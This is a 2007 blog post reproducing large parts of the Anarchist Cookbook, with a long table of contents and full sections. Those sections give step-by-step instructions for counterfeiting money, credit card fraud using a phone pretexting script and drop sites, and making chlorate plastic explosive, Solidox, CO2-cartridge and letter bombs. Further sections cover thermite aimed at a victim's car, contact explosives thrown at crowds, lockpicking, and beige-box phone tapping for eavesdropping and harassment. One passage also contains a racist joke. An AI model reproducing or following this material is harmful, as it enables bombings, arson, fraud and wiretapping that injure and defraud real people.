Thursday, February 15, 2007

a simple instruction for educational purposes

ANARCHY COOKBOOK v.666* By: Jolly RogerMerged/Converted to Clean ASCII Format By: THE HAND OF FATE (THOF)Hyperlinked By Pyro htttp://www.iampyro.cjb.net or http://www.iampyro.comSome files are missing, maybe some day I'll put those in to, butfor now if you're missing something then you could download cookbook IVor cookbook V or read either of them online.[Table of Contents]Counterfeiting MoneyCredit Card FraudMaking Plastic Explosives from BleachPicking Master LocksThe Arts of Lockpicking IThe Arts of Lockpicking IISolidox BombsHigh Tech Revenge: The Beigebox (NEW Revision 2.0)CO2 BombsThermite BombsTouch ExplosivesLetter BombsPaint BombsWays to send a car to HELLDo ya hate school?Phone related vandalismHighway police radar jammingSmoke BombsMail Box BombsHotwiring carsNapalmFertilizer BombTennis Ball BombDiskette BombsUnlisted Phone NumbersFusesHow to make Potassium NitrateExploding LightbulbsUnder water ignitersHome-brew blast cannonChemical Equivalency ListPhone TapsLandminesA different kind of Molitov CocktailPhone Systems Tutorial IPhone Systems Tutorial IIBasic Alliance TeleconferencingAqua Box PlansHindenberg BombHow to Kill Someone with your Bare HandsPhone Systems Tutorial IIIBlack Box PlansThe Blotto BoxBlowgunBrown Box PlansCalcium Carbide BombMore Ways to Send a Car to HellRipping off Change MachinesClear Box PlansCNA Number ListingElectronic TerrorismHow to Start a Conference w/o 2600hz or M-FDynamiteHousehold equivalants for chemiclesAuto Exhaust Flame Thower
How to Break into BBs ExpressFirebombFuse BombGeneric BombGreen Box PlansPortable Grenade LauncherBasic Hacking Tutorial IBasic Hacking Tutorial IIHacking DEC'sHarmless BombsBreaking into HousesHypnotismRemote Informer Issue #1Jackpotting ATM MachinesJug BombFun at K-MartMace SubstituteHow to Grow MarijuanaMatch Head BombTerrorizing McDonalds"Mentor's" Last WordsThe Myth of the 2600hz DetectorBlue Box PlansNapalm IINitroglycerin RecipeOperation: FuckupStealing Calls from PayphonesPool FunFree PostageUnstable ExplosivesWeird DrugsThe Art of CardingRecognizing Credit CardsHow to Get a New IdentityRemote Informer Issue #2Remote Informer Issue #3Remote Informer Issue #4Remote Informer Issue #5Phreaker's Guide to Loop LinesMa-Bell TutorialGetting Money out of Pay PhonesComputer-based PBXPC-Pursuit Port StatisticsPearl Box PlansThe Phreak FileRed Box PlansRemObSScarlet Box PlansSilver Box PlansBell TrashingCanadian WATS PhonebookHacking TRWHacking VAX & UNIXVerification CircuitsWhite Box PlansThe BLAST BoxDealing with the Rate & Route OperatorCellular Phone PhreakingCheesebox PlansHow to Start Your Own Conferences
Gold Box PlansThe History of ESSThe Lunch BoxOlive Box PlansThe Tron BoxMore TRW Info"Phreaker's Phunhouse"Phrack Magazine - Vol. 3, Issue 27 (Intro to MIDNET)Phrack Magazine - Vol. 3, Issue 27 (The Making of a Hacker)Phrack Magazine - Vol. 3, Issue 28 (Network Miscellany)Phrack Magazine - Vol. 3, Issue 28 (Pearl Box Schematic)Phrack Magazine - Vol. 3, Issue 28 (Snarfing Remote Files)Phrack Magazine - Vol. 3, Issue 30 (Western Union, Telex, TWX & Time Service)Phrack Magazine - Vol. 3, Issue 30 (Hacking & Tymnet)Phrack Magazine - Vol. 3, Issue 30 (The DECWRL Mail Gateway)Sodium ChlorateMercury FulminateImprovised Black PowderNitric AcidDust Bomb InstructionsCarbon-Tet ExplosiveMaking Picric Acid from AspirinReclamation of RDX from C-4 ExplosivesEgg-based Gelled Flame FuelsClothespin SwitchFlexible Plate SwitchLow Signature Systems (Silencers)Delay Igniter From CigaretteNicotineDried Seed TimerNail GrenadeBell GlossaryPhone Dial Locks -- How to Beat'emExchange ScanningA Short History of Phreaking"Secrets of the Little Blue Box" (story)The History of British Phreaking"Bad as Shit" (story)TelenetFucking with the OperatorPhrack Magazine - Vol. 1, Issue 1 (The Phone Preak's Guide)International Country Code ListingInfinity Transmitter Schematic and PlansLSDBananasYummy Marihuana RecipesPeanutsChemical Fire BottleIgniter from Book Matches"Red or White Powder" PropellantPipe Hand GrenadeEuropean Credit Card Fraud (Written by Creditman! A Cookbook III Exclusive!!)


Counterfeiting Money"gravure", whichinvolves etching a metal block. Since etching a metal block isimpossible to do by hand, photo offset printing comes into theprocess.
Photo offset printing starts by making negatives of the currencywith a camera, and putting the negatives on a piece of maskingmaterial (usually orange in color). The stripped negatives,commonly called "flats", are then exposed to a lithographic platewith an arc light plate maker. The burned plates are thendeveloped with the proper developing chemical. One at a time,these plates are wrapped around the plate cylinder of the press.
The press to use should be an 11 by 14 offset, such as the AB Dick360. Make 2 negatives of the portrait side of the bill, and 1 ofthe back side. After developing them and letting them dry, takethem to a light table. Using opaque on one of the portrait sides,touch out all the green, which is the seal and the serial numbers.The back side does not require any retouching, because it is allone color. Now, make sure all of the negatives are registered(lined up correctly) on the flats. By the way, every time youneed another serial number, shoot 1 negative of the portrait side,cut out the serial number, and remove the old serial number fromthe flat replacing it with the new one.
Now you have all 3 flats, and each represents a different color:black, and 2 shades of green (the two shades of green are createdby mixing inks). Now you are ready to burn the plates. Take alithographic plate and etch three marks on it. These marks mustbe 2 and 9/16 inches apart, starting on one of the short edges.Do the same thing to 2 more plates. Then, take 1 of the flats andplace it on the plate, exactly lining the short edge up with theedge of the plate. Burn it, move it up to the next mark, andcover up the exposed area you have already burned. Burn that, anddo the same thing 2 more times, moving the flat up one more mark.Do the same process with the other 2 flats (each on a separateplate). Develop all three plates. You should now have 4 imageson each plate with an equal space between each bill.
The paper you will need will not match exactly, but it will do formost situations. The paper to use should have a 25% rag content.By the way, Disaperf computer paper (invisible perforation) doesthe job well. Take the paper and load it into the press. Be sureto set the air, buckle, and paper thickness right. Start with theblack plate (the plate without the serial numbers). Wrap itaround the cylinder and load black ink in. Make sure you run morethan you need because there will be a lot of rejects. Then, whilethat is printing, mix the inks for the serial numbers and the backside. You will need to add some white and maybe yellow to theserial number ink. You also need to add black to the back side.Experiment until you get it right. Now, clean the press and print
the other side. You will now have a bill with no green seal orserial numbers. Print a few with one serial number, make anotherand repeat. Keep doing this until you have as many differentnumbers as you want. Then cut the bills to the exact size with apaper cutter. You should have printed a large amount of money bynow, but there is still one problem; the paper is pure white. Todye it, mix the following in a pan: 2 cups of hot water, 4 teabags, and about 16 to 20 drops of green food coloring (experimentwith this). Dip one of the bills in and compare it to a genuineUS bill. Make the necessary adjustments, and dye all the bills.Also, it is a good idea to make them look used. For example,wrinkle them, rub coffee grinds on them, etc.
As before mentioned, unless you are familiar with photo offsetprinting, most of the information in this article will be fairlyhard to understand. Along with getting a book on photo offsetprinting, try to see the movie "To Live and Die in LA". It isabout a counterfeiter, and the producer does a pretty good job ofshowing how to counterfeit. A good book on the subject is "ThePoor Man's James Bond".
If all of this seems too complicated to you, there is one othermethod available for counterfeiting: The Canon color lasercopier. The Canon can replicate ANYTHING in vibrant color,including US currency. But, once again, the main problem incounterfeiting is the paper used. So, experiment, and good luck! -Jolly Roger-
Credit Card Fraud brought to you by The Jolly Roger
For most of you out there, money is hard to come by. Until now:
With the recent advent of plastic money (credit cards), it iseasy to use someone else's credit card to order the items you havealways desired in life. The stakes are high, but the payoff isworth it.
Step One: Getting the credit card information
First off, you must obtain the crucial item: someone's creditcard number. The best way to get credit card numbers is to takethe blue carbons used in a credit card transaction at your localdepartment store. These can usually be found in the garbage cannext to the register, or for the more daring, in the garbagedumpster behind the store. But, due to the large amount of creditcard fraud, many stores have opted to use a carbonless transactionsheet, making things much more difficult. This is where yourphone comes in handy.
First, look up someone in the phone book, and obtain as muchinformation as possible about them. Then, during business hours,call in a very convincing voice - "Hello, this is John Doe fromthe Visa Credit Card Fraud Investigations Department. We havebeen informed that your credit card may have been used forfraudulent purposes, so will you please read off the numbersappearing on your Visa card for verification." Of course, useyour imagination! Believe it or not, many people will fall for
this ploy and give out their credit information.
Now, assuming that you have your victim's credit card number, youshould be able to decipher the information given.
Step Two: Recognizing information from carbon copies
Card examples:
[American Express]XXXX XXXXXX XXXXXMM/Y1 THRU MM/Y2JOE SHMOE
[American Express]XXXX XXXXXX XXXXXMM/Y1 THRU MM/Y2JOE SHMOE
Explanation: MM/Y1 is the date the card was issued, and MM/Y2 is the expiration date. The American Express Gold Card has numbers XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00, even if the card holder is broke.
[Mastercard]5XXX XXXX XXXX XXXXXXXX AAA DD-MM-YY MM/YYJOE SHMOE
Explanation: XXXX in the second row may be asked for during the ordering process. The first date is when the card was new, and the second is when the card expires. The most frequent number combination used is 5424 1800 XXXX XXXX. There are many of these cards in circulation, but many of these are on wanted lists, so check these first.
[Visa]4XXX XXX(X) XXX(X) XXX(X)MM/YY MM/YY*VISAJOE SHMOE
Explanation: Visa is the most abundant card, and is accepted almost everywhere. The "*VISA" is sometimes replaced with "BWG", or followed with a special code. These codes are as follows:
[1] MM/YY*VISA V - Preferred Card [2] MM/YY*VISA CV - Classic Card [3] MM/YY*VISA PV - Premier Card
Preferred Cards are backed with money, and are much safer to use. Classic Cards are newer, harder to reproduce cards with decent backing. Premier Cards are Classic Cards with Preferred coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000 XXXX, and 4254 5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards are IBM Credit Union cards, and are risky to use, although
they are usually covered for large purchases.
Step Three: Testing credit
You should now have a Visa, Mastercard, or American Expresscredit card number, with the victim's address, zip code, and phonenumber. By the way, if you have problems getting the address,most phone companies offer the Address Tracking Service, which isa special number you call that will give you an address from aphone number, at a nominal charge. Now you need to check thebalance of credit on the credit card (to make sure you don't runout of money), and you must also make sure that the card isn'tstolen. To do this you must obtain a phone number thatbusinesses use to check out credit cards during purchases. If yougo to a department store, watch the cashier when someone makes acredit card purchase. He/she will usually call a phone number,give the credit information, and then give what is called a"Merchant Number". These numbers are usually written down on oraround the register. It is easy to either find these numbers andcopy them, or to wait until they call one in. Watch what theydial and wait for the 8 digit (usually) merchant number. Once youcall the number, in a calm voice, read off the account number,merchant number, amount, and expiration date. The credit bureauwill tell you if it is ok, and will give you an authorizationnumber. Pretend you are writing this number down, and repeat itback to them to check it. Ignore this number completely, for itserves no real purpose. However, once you do this, the bankremoves dollars equal to what you told them, because the card wassupposedly used to make a purchase. Sometimes you can trick theoperator by telling her the customer changed his mind and decidednot to charge it. Of course, some will not allow this. Rememberat all times that you are supposed to be a store clerk calling tocheck out the card for a purchase. Act like you are talking witha customer when he/she "cancels".
Step Four: The drop
Once the cards are cleared, you must find a place to have thepackage sent. NEVER use a drop more than once. The following aretypical drop sites:
[1] An empty house
An empty house makes an excellent place to send things. Send thepackage UPS, and leave a note on the door saying, "UPS. I workdays, 8 to 6. Could you please leave the package on the back doorstep?" You can find dozens of houses from a real estate agent bytelling them you want to look around for a house. Ask for a listof twenty houses for sale, and tell them you will check out thearea. Do so, until you find one that suits your needs.
[2] Rent A Spot
U-Haul sometimes rents spaces where you can have packages sent andsigned for. End your space when the package arrives.
[3] People's houses
Find someone you do not know, and have the package sent there.Call ahead saying that "I called the store and they sent thepackage to the wrong address. It was already sent, but can youkeep it there for me?" This is a very reliable way if you keepcalm when talking to the people.
Do NOT try post office boxes. Most of the time, UPS will notdeliver to a post office box, and many people have been caught inthe past attempting to use a post office box. Also, when you havedetermined a drop site, keep an eye on it for suspiciouscharacters and cars that have not been there before.
Step Five: Making the transaction
You should now have a reliable credit card number with all thenecessary billing information, and a good drop site.
The best place to order from is catalogues, and mail order houses.It is in your best interest to place the phone call from a payphone, especially if it is a 1-800 number. Now, when you call,don't try to disguise your voice, thinking you will trick thesalesperson into believing you are an adult. These folks aretrained to detect this, so your best bet is to order in your ownvoice. They will ask for the following: name, name as it appearson card, phone number, billing address, expiration date, method ofshipping, and product. Ask if they offer UPS Red shipping (nextday arrival), because it gives them less time to research anorder. If you are using American Express, you might have a bit ofa problem shipping to an address other than the billing address.Also, if the salesperson starts to ask questions, do NOT hang up.Simply talk your way out of the situation, so you won't encourageinvestigation on the order.
If everything goes right, you should have the product, free ofcharge. Insurance picks up the tab, and no one is any wiser. Becareful, and try not to order anything over $500. In some states,UPS requires a signature for anything over $200, not to mentionthat anything over $200 is defined as grand theft, as well ascredit fraud. Get caught doing this, and you will bite it for acouple of years. Good luck!Making Plastic Explosives from Bleach by The Jolly Roger
Potassium chlorate is an extremely volatile explosive compound,and has been used in the past as the main explosive filler ingrenades, land mines, and mortar rounds by such countries asFrance and Germany. Common household bleach contains a smallamount of potassium chlorate, which can be extracted by theprocedure that follows.
First off, you must obtain:
[1] A heat source (hot plate, stove, etc.)[2] A hydrometer, or battery hydrometer[3] A large Pyrex, or enameled steel container (to weigh chemicals)[4] Potassium chloride (sold as a salt substitute at health and nutrition stores)
Take one gallon of bleach, place it in the container, and beginheating it. While this solution heats, weigh out 63 grams ofpotassium chloride and add this to the bleach being heated.Constantly check the solution being heated with the hydrometer,and boil until you get a reading of 1.3. If using a batteryhydrometer, boil until you read a FULL charge.
Take the solution and allow it to cool in a refrigerator until itis between room temperature and 0 degrees Celcius. Filter out thecrystals that have formed and save them. Boil this solution againand cool as before. Filter and save the crystals.
Take the crystals that have been saved, and mix them withdistilled water in the following proportions: 56 grams per 100milliliters distilled water. Heat this solution until it boilsand allow to cool. Filter the solution and save the crystals thatform upon cooling. This process of purification is called"fractional crystalization". These crystals should be relativelypure potassium chlorate.
Powder these to the consistency of face powder, and heat gently todrive off all moisture.
Now, melt five parts Vaseline with five parts wax. Dissolve thisin white gasoline (camp stove gasoline), and pour this liquid on90 parts potassium chlorate (the powdered crystals from above)into a plastic bowl. Knead this liquid into the potassiumchlorate until intimately mixed. Allow all gasoline to evaporate.
Finally, place this explosive into a cool, dry place. Avoidfriction, sulfur, sulfides, and phosphorous compounds. Thisexplosive is best molded to the desired shape and density of 1.3grams in a cube and dipped in wax until water proof. These blocktype charges guarantee the highest detonation velocity. Also, ablasting cap of at least a 3 grade must be used.
The presence of the afore mentioned compounds (sulfur, sulfides,etc.) results in mixtures that are or can become highly sensitiveand will possibly decompose explosively while in storage. Youshould never store homemade explosives, and you must use EXTREMEcaution at all times while performing the processes in thisarticle.
You may obtain a catalog of other subject of this nature bywriting:
Information Publishing Co. Box 10042 Odessa, Texas 79762
Picking Master Locks by The Jolly Roger
Have you ever tried to impress someone by picking one of thoseMaster combination locks and failed?
The Master lock company made their older combination locks with aprotection scheme. If you pull the handle too hard, the knob willnot turn. That was their biggest mistake.
‡The first number:
Get out any of the Master locks so you know what is going on.While pulling on the clasp (part that springs open when you getthe combination right), turn the knob to the left until it willnot move any more, and add five to the number you reach. You nowhave the first number of the combination.
The second number:
Spin the dial around a couple of times, then go to the firstnumber you got. Turn the dial to the right, bypassing the firstnumber once. When you have bypassed the first number, startpulling on the clasp and turning the knob. The knob willeventually fall into the groove and lock. While in the groove,pull the clasp and turn the knob. If the knob is loose, go to thenext groove, if the knob is stiff, you have the second number ofthe combination.
The third number:
After getting the second number, spin the dial, then enter the twonumbers. Slowly spin the dial to the right, and at each number,pull on the clasp. The lock will eventually open if you did theprocess right.
This method of opening Master locks only works on older models.Someone informed Master of their mistake, and they employed a newmechanism that is foolproof (for now).
The Arts of Lockpicking I courtesy of The Jolly Roger
Lockpicking I: Cars and assorted other locks
While the basic themes of lockpicking and uninvited entry have notchanged much in the last few years, some modern devices andtechniques have appeared on the scene.
Automobiles:
Many older automobiles can still be opened with a Slim Jim type ofopener (these and other auto locksmithing techniques are coveredfully in the book "In the Still of the Night", by John RussellIII); however, many car manufacturers have built cases over thelock mechanism, or have moved the lock mechanism so the Slim Jimwill not work. So:
American Locksmith ServiceP.O. Box 26Culver City, CA 90230
ALS offers a new and improved Slim Jim that is 30 inches long and3/4 inches wide, so it will both reach and slip through the newcar lock covers (inside the door). Price is $5.75 plus $2.00postage and handling.
Cars manufactured by General Motors have always been a bane topeople who needed to open them, because the sidebar locking unit
they employ is very difficult to pick. To further complicatematters, the new GM cars employ metal shields to make the use of aSlim Jim type instrument very difficult. So:
Lock Technology Corporation685 Main St.New Rochelle, NY 10801
LTC offers a cute little tool which will easily remove the lockcylinder without harm to the vehicle, and will allow you to enterand/or start the vehicle. The GMC-40 sells for $56.00 plus $2.00for postage and handling.
The best general automobile opening kit is probably a set oflockout tools offered by:
Steck MFG Corporation1319 W. Stewart St.Dayton, OH 45408
For $29.95 one can purchase a complete set of six carbon lockouttools that will open more than 95% of all the cars around.
Kwickset locks have become quite popular as one step securitylocks for many types of buildings. They are a bit harder to pickand offer a higher degree of security than a normal builderinstalled door lock. So:
A MFG1151 Wallace St.Massilon, OH 44646
Price is $11.95. Kwickset locks can handily be disassembled andthe door opened without harm to either the lock or the door byusing the above mentioned Kwick Out tool.
If you are too lazy to pick auto locks:
Veehof SupplyBox 361Storm Lake, IO 50588
VS sells tryout keys for most cars (tryout keys are used sincethere is no one master key for any one make of car, but there aregroup type masters (a.k.a. tryout keys). Prices average about$20.00 a set.
Updated Lockpicking:
For years, there have been a number of pick attack procedures formost pin and tumbler lock systems. In reverse order of ease theyare as follows:
Normal Picking: Using a pick set to align the pins, one by one, until the shear line is set and the lock opens.
Racking: This method uses picks that are constructed with a series of bumps, or diamond shape notches. These picks
are "raked" (i.e. run over all the pins at one time). With luck, the pins will raise in the open position and stay there. Raking, if successful, can be much less of an effort than standard picking.
Lock Aid Gun: This gun shaped device was invented a number of years ago and has found application with many locksmiths and security personnel. Basically, a needle shaped pick is inserted in the snout of the "gun", and the "trigger" is pulled. This action snaps the pick up and down strongly. If the tip is slipped under the pins, they will also be snapped up and down strongly. With a bit of luck they will strike each other and separate at the shear line for a split second. When this happens the lock will open. The lock aid gun is not 100% successful, but when it does work, the results are very dramatic. You can sometimes open the lock with one snap of the trigger.
Vibrator: Some crafty people have mounted a needle pick into an electric toothbrush power unit. This vibrating effect will sometimes open pin tumbler locks -- instantly.
There is now another method to open pin and wafer locks in a veryshort time. Although it resembles a toothbrush pick inappearance, it is actually an electronic device. I am speaking ofthe Cobra pick that is designed and sold by:
Fed CorporationP.O. Box 569Scottsdale, AR 85252
The Cobra uses two nine volt batteries, teflon bearings (for lessnoise), and a cam roller. It comes with three picks (fordifferent types of locks) and works both in America and overseas,on pin or wafer locks. The Cobra will open group one locks(common door locks) in three to seven seconds with no damage, inthe hands of an experienced locksmith. It can take a few secondsmore or up to a half a minute for someone with no experience atall. It will also open group two locks (including government,high security, and medecos), although this can take a short timelonger. It will not open GM sidear locks, although a device isabout to be introduced to fill that gap. How much for this toythat will open most locks in seven seconds?
$235.00 plus $4.00 shipping and handling.
For you hard core safe crackers, FC also sells the MI-6 that willopen most safes at a cost of $10,000 for the three wheel attackmodel, and $10,500 for the four wheel model. It comes in a sturdyaluminum carrying case with monitor, disk drive and software.
If none of these safe and sane ideas appeal to you, you can alwaysfall back on the magic thermal lance...
The thermal lance is a rather crude instrument constructed from3/8 inch hollow magnesium rods. Each tube comes in a 10 foot
length, but can be cut down if desired. Each one is threaded onone end. To use the lance, you screw the tube together with amatted regulator (like a welding outfit uses) and hook up anoxygen tank. Then oxygen is turned on and the rod is lit with astandard welding ignitor. The device produces an incredibleamount of heat. It is used for cutting up concrete blocks or evenrocks. An active lance will go through a foot of steel in a fewseconds. The lance is also known as a burning bar, and isavailable from:
C.O.L. MFG7748 W. AddisonChicago, IL 60634The Arts of Lockpicking II courtesy of The Jolly Roger
So you want to be a criminal. Well, if you want to be like JamesBond and open a lock in fifteen seconds, then go to Hollywood,because that is the only place you are ever going to do it. Evenexperienced locksmiths can spend five to ten minutes on a lock ifthey are unlucky. If you are wanting extremely quick access, lookelsewhere. The following instructions will pertain mostly to the"lock in knob" type lock, since it is the easiest to pick.
First of all, you need a pick set. If you know a locksmith, gethim to make you a set. This will be the best possible set for youto use. If you find a locksmith unwilling to supply a set, don'tgive up hope. It is possible to make your own, if you have accessto a grinder (you can use a file, but it takes forever).
The thing you need is an allen wrench set (very small). Theseshould be small enough to fit into the keyhole slot. Now, bendthe long end of the allen wrench at a slight angle (not 90degrees). Now, take your pick to a grinder or a file, and smooththe end until it is rounded so it won't hang inside the lock.Test your tool out on doorknobs at your house to see if it willslide in and out smoothly. Now, this is where the screwdrivercomes in. It must be small enough for it and your pick to be usedin the same lock at the same time, one above the other. In thecoming instructions, please refer to this chart of the interior ofa lock:______________________________ \ K / E \ Y [] Upper tumbler pin ^ ^ / H [^] Lower tumbler pin ^ ^ ^ ^ ^ ^ \ O [-] Cylinder wall / L (This is a greatly simplified \ E drawing)______________________________/
The object is to press the pin up so that the space between theupper pin and the lower pin is level with the cylinder wall. Now,if you push a pin up, it's tendency is to fall back down, right?That is where the screwdriver comes in. Insert the screwdriverinto the slot and turn. This tension will keep the "solved" pinsfrom falling back down. Now, work from the back of the lock tothe front, and when you are through, there will be a click, thescrewdriver will turn freely, and the door will open.
‡Do not get discouraged on your first try! It will probably takeyou about twenty to thirty minutes your first time. After that,you will quickly improve with practice.Solidox Bombs by The Jolly Roger
Most people are not aware that a volatile, extremely explosivechemical can be bought over the counter: Solidox.
Solidox comes in an aluminum can containing 6 grey sticks, and canbe bought at Kmart, and various hardware supply shops for around$7.00. Solidox is used in welding applications as an oxidizingagent for the hot flame needed to melt metal. The most activeingredient in Solidox is potassium chlorate, a filler used in manymilitary applications in the WWII era.
Since Solidox is literally what the name says: SOLID OXygen, youmust have an energy source for an explosion. The most common andreadily available energy source is common household sugar, orsucrose. In theory, glucose would be the purest energy source,but it is hard to find a solid supply of glucose.
Making the mixture:
[1] Open the can of Solidox, and remove all 6 sticks. One by one, grind up each of the sticks (preferably with a mortar and pestle) into the finest powder possible.[2] The ratio for mixing the sugar with the Solidox is 1:1, so weigh the Solidox powder, and grind up the equivalent amount of sugar.[3] Mix equivalent amounts of Solidox powder, and sugar in a 1:1 ratio.
It is just that simple! You now have an extremely powerfulsubstance that can be used in a variety of applications. A wordof caution: be EXTREMELY careful in the entire process. Avoidfriction, heat, and flame. A few years back, a teenager I knewblew 4 fingers off while trying to make a pipe bomb with Solidox.You have been warned!High Tech Revenge: The Beigebox rev.2 by The Jolly Roger
-------------Introduction-------------Have you ever wanted a lineman's handset? Surely every phreak has atleast once considered the phun that he could have with one. After searchingunlocked phone company trucks for months, we had an idea. We could buildone. We did, and named it the "Beige Box" simply because that is the colorof ours.The beigebox is simply a consumer lineman's handset, which is aphone that can be attached to the outside of a person's house. Tofabricate a beigebox, follow along.
---------Construction and Use---------The construction is very simple. First you must understand the concept ofthe device. In a modular jack, there are four wires. These are red, green,yellow, and black. For a single line telephone, however, only two matter:the red (ring) and green (tip). The yellow and the black are not neccessaryfor this project. A lineman's handset has two clips on it: the ring andthe tip. Take a modular jack and look at the bottom of it's casing. Thereshould be a grey jack with four wires (red, green, yellow & black)
leading out of it. To the end of the red wire attach a red aligator clip.To the end of the green wire attatch a green aligator clip. The yellowand black wires can be removed, although I would only set them aside sothat you can use the modular jack in future projects. Now insert yourtelephone's modular plug into the modular jack. That's it. This particularmodel is nice because it is can be easily made, is inexpensive, usescommon parts that are readily available, is small, is lightweight,and does not require the destruction of a phone.
------------Beige Box Uses------------There are many uses for a Beige Box. However, before you can use it,you must know how to attach it to the output device. This device can beof any of Bell switching apparatus that include germinal sets (i.e.remote switching centers, bridgin heads, cans, etc.). To open most BellTelephone switching apparatus, you must have a 7/16 inch hex driver(or a good pair of needle nose pliers work also).This piece of equipment can be picked up at your local hardware store.With your hex driver (or pliers), turn the security bolt(s) approximately1/8 of an inch counter-clockwise and open. If your output device is locked,then you must have some knowledge of destroying and/or picking locks.However, we have never encountered a locked output device. Once you haveopened your output device, you should see a mass of wires connected toterminals. On most output devices, the terminals should be labeled "T"(Tip -- if not labeled, it is usually on the left) and "R" (Ring -- ifnot labeled, usually on the right).
Remember: Ring - red - right. The "Three R's" -- a simple way toremember which is which. Now you must attach all the red alligator clip(Ring) to the "R" (Ring) terminal.Attach the green alligator clip (Tip) to the "T" (Tip) terminal.
Note: If instead of a dial tone you hear nothing, adjust the alligatorclips so that they are not touching each other terminals. Also make surethey are firmly attached. By this time you should hear a dial tone.Dial ANI to find out the number you are using (you wouldn't want to useyour own). Here are some practicle aplications:
> Eavesdropping > Long distance, static free free fone calls to phriends > Dialing direct to Alliance Teleconferencing (also no static) > Phucking people over > Bothering the operator at little risk to yourself > Blue Boxing with greatly reduced chance of getting caught > Anything at all you want, since you are on an extension of thatline.
Eavesdropping-------------To be most effective, first attach the Beige Box then your phone. Thiseliminates the static caused by connecting the box, thereforereducing the potential suspicion of your victim. When eavesdropping,it is allways best to be neither seen nor heard. If you hear someonedialing out, do not panic; but rather hang up, wait, and pick up thereceiver again. The person will either have hung up or tried to completetheir call again. If the latter is true, then listen in, and perhaps youwill find information worthy of blackmail! If you would like to know whoyou are listening to, after dialing ANI, pull a CN/A on the number.
Dialing Long Distance---------------------This section is self explanitory, but don't forget to dial a "1" beforethe NPA.
Dialing Direct to Aliance Teleconferencing------------------------------------------Simply dial 0-700-456-1000 and you will get instructions from there.I prefer this method over PBX's, since PBX's often have poor receptionand are more dificult to come by.
Phucking People Over--------------------This is a very large topic of discussion. Just by using the other topicsdescribed, you can create a large phone bill for the person (they willnot have to pay for it, but it will be a big hassle for them). In addition,since you are an extension of the person's line, you can leave yourphone off the hook, and they will not be able to make or receive calls.This can be extremely nasty because no one would expect the causeof the problem.Bothering the Operator----------------------This is also self explanitary and can provide hours of entertainment.Simply ask her things that are offensive or you would not like tracedto your line. This also corresponds to the previously described section,Phucking People Over. After all, guess who's line it gets traced to?He he he...
Blue Boxing-----------See a file on Blue Boxing for more details. This is an especially nicefeature if you live in an ESS-equiped prefix, since the calls are, onceagain, not traced to your line...
---POTENTIAL RISKS OF BEIGE BOXING----Overuse of the Beige Box may cause suspicians within the Gestapo,and result in legal problems. Therefor, I would recomend you:
> Choose a secluded spot to do your Beige Boxing, > Use more than one output device > Keep a low profile (i.e., do not post under your real name on a public BBS concering your occomplishments) > In order to make sure the enemy has not been inside youroutput device, I recomend you place a piece of transparent tape over the opening of your output device. Therefor, if it is opened in your abscence, the tapqe will be displaced and you will be aware of the fact that someone has intruded on your teritory.
Now, imagine the possibilities: a $2000 dollar phone bill forthat special person, 976 numbers galore, even harassing theoperator at no risk to you! Think of it as walking into anenemies house, and using their phone to your heart's content.
---------Jolly Roger
How to make a CO2 bomb by the Jolly Roger
‡You will have to use up the cartridge first by either shooting itor whatever. With a nail, force a hole bigger so as to allow thepowder and wick to fit in easily. Fill the cartridge with blackpowder and pack it in there real good by tapping the bottom of thecartridge on a hard surface (I said TAP not SLAM!). Insert a fuse.I recommend a good water-proof cannon fuse, or an m-80 type fuse,but firecracker fuses work, if you can run like a black man runsfrom the cops after raping a white girl.) Now, light it and runlike hell! It does wonders for a row of mailboxes (like the onesin apartment complexes), a car (place under the gas tank), apicture window (place on window sill), a phone booth (place rightunder the phone), or any other devious place. This thing throwsshrapnel, and can make quit a mess!! -Jolly Roger-

Thermite II... or A better way to make Thermite by Jolly Roger
Thermite is nasty shit. Here is a good and easy way to make it.The first step is to get some iron-oxide (which is RUST!). Here isa good way to make large quantities in a short time:
- Get a DC convertor like the one used on a train set. Cut theconnector off, seperate the wires, and strip them both.
- Now you need a jar of water with a tablespoon or so of sodiumchloride (which is SALT!) added to it. This makes the waterconductive.
- Now insert both wires into the mixture (I am assuming youplugged the convertor in...) and let them sit for five minutes.One of them will start bubbling more than the other. This is thePOSITIVE(+) wire. If you do not do this test right, the finalproduct will be the opposite (chemically) of rust, which is RUSTACID. You have no use for this here (although it IS useful!).
- Anyway, put the nail tied to the positive wire into the jar. Nowput the negative wire in the other end. Now let it sit overnightand in the morning scrape the rust off of the nail & repeat untilyou got a bunch of rust on the bottom of the glass. Be generouswith your rust collection. If you are going through the trouble ofmaking thermite, you might as well make a lot, right?
- Now remove the excess water and pour the crusty solution onto acookie sheet. Dry it in the sun for a few hours, or insideovernight. It should be an orange-brown color (although I haveseen it in many different colors! Sometimes the color gets fuckedup, what can I say... but it is still iron oxide!)
- Crush the rust into a fine powder and heat it in a cast-iron potuntil it is red. Now mix the pure iron oxide with pure alluminumfilinos which can be bought or filed down by hand from an aluminumtube or bar. The ratio or iron oxide to aluminum is 8 grams to 3grams.
- Congrats! You have just made THERMITE! Now, to light it...
- Thermite requires a LOT of heat (more than a blow torch!) to
ignite. However, a magnesium ribbon (which is sorta hard to find..call around) will do the trick. It takes the heat from theburning magnesium to light the thermite.
- Now when you see your victim's car, pour a fifty-cent sized pileonto his hood, stick the ribbon in it, and light the ribbon withthe blow torch. Now chuckle as you watch it burn through the hood,the block, the axle, and the pavement. BE CAREFUL! The idealmixtures can vaporize CARBON STEEL! Another idea is to usethermite to get into pay phone cash boxes. HAVE FUN!! -Jolly Roger-
Touch Explosives by the Jolly Roger
This is sort of a mild explosive, but it can be quite dangerous inlarge quantities. To make touch explosive (such as that found in asnap-n-pop, but more powerful), use this recipe:
- Mix iodine crystals into ammonia until the iodine crystals willnot dissolve into the ammonia anymore. Pour off the excess ammoniaand dry out the crystals on a baking sheet the same way as youdried the thermite (in other words, just let it sit overnight!).
- Be careful now because these crystals are now your touchexplosive. Carefully wrap a bunch in paper (I mean carefully!Friction sets 'em off!) and throw them around.. pretty loud, huh?They are fun to put on someone's chair. Add a small fish sinker tothem and they can be thrown a long distance (good for crowds,football games, concerts, etc.) Have fun! -Jolly Roger-
Letter Bombs by The Jolly Roger
- You will first have to make a mild version of thermite. Use myrecipe, but substitute iron fillings for rust.
- Mix the iron with aluminum fillings in a ratio of 75% aluminumto 25% iron. This mixture will burn violently in a closed space(such as an envelope). This bring us to our next ingredient...
- Go to the post office and buy an insulated (padded) envelope.You know, the type that is double layered... Seperate the layersand place the mild thermite in the main section, where the letterwould go. Then place magnesium powder in the outer layer. There isyour bomb!!
